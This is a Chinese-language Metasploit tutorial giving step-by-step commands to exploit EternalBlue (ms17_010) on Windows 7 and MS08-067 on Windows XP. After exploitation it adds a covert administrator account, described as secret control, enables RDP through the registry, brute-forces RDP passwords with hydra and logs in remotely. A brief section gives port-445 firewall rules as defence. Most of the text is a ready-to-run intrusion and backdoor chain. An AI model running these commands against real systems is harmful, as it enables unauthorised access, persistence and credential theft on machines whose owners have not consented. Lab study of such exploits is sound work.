metasploit渗透测试教程
1、一些常用指令
msfconsole 打开控制台终端 msfupdate 更新 help [command] e.g. help search 命令使用帮助信息 search […] e.g. search portscan
use … 选择渗透攻击模块

2、show payloads 查看与该攻击模块相兼容的攻击载荷 set payload … 设置攻击载荷 set target 设置目标 show options 查看需要设置的配置参数 exploit 实施渗透攻击
metasploit渗透攻击模块在目录/usr/share/metasploit-framework/modules/exploits
nmap <扫描选项><扫描目标>

3、攻击实例
1、利用永恒之蓝(ms17_010)漏洞攻击win7
打开metasploit msfconsole
使用永恒之蓝模块 search ms17-01 use exploit/windows/smb/ms17_010_eternalblue

4、填充各种指令,主要是靶机IP,其中445端口已经默认了,其他不用改 show options set RHOST 192.168.12.1
攻击 exploit或者run
创建新用户,偷偷的控制使用 net user admin 123456 /add
提权,将新创建的用户admin提到管理员权限 net localgroup administrators admin /add 查看权限: net user admin

5、防御办法: 1,网上下载补丁, 2,关闭445端口,dos命令: netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445 检测445端口是否开启: netstat -ano -p tcp | find “445”

6、利用Windows Server服务RPC请求缓冲区溢出漏洞(ms_08067)入侵WinXP
在msfconsole使用search命令搜索MS08067漏洞攻击程序
使用use命令调用MS08067漏洞攻击程序 use exploit/windows/smb/ms08_067_netapi
使用show options 命令查看需要设置的选项 可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标) 使用 set 命令设置 Module Options,此处需要设置目标IP

7、接着设置Exploit target,使用show targets 查看可选项 可以看出哪些版本的系统存在此漏洞,攻击的XP系统为WinXP SP3 简体中文版,即使用set target 命令设置目标,此处即为set target 34
此时再用show options 可以看到全部设置完成,接着使用exploit 或者 run 进行攻击,执行exploit命令后得到一个meterpreter
在meterpreter中输入shell即可进入CMD窗口
可以进行一些攻击,如远程桌面控制:

8、—-打开RDP服务 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f —-使用netstat -an命令查看端口是否开放 —-接着使用net user命令查看XP系统中的用户 net user —-然后针对指定用户比如sysorem用户进行登录密码爆破 hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt —-使用hydra爆破密码得:12345接着就能直接登录XP进行远程控制 rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389 —-完成远程控制
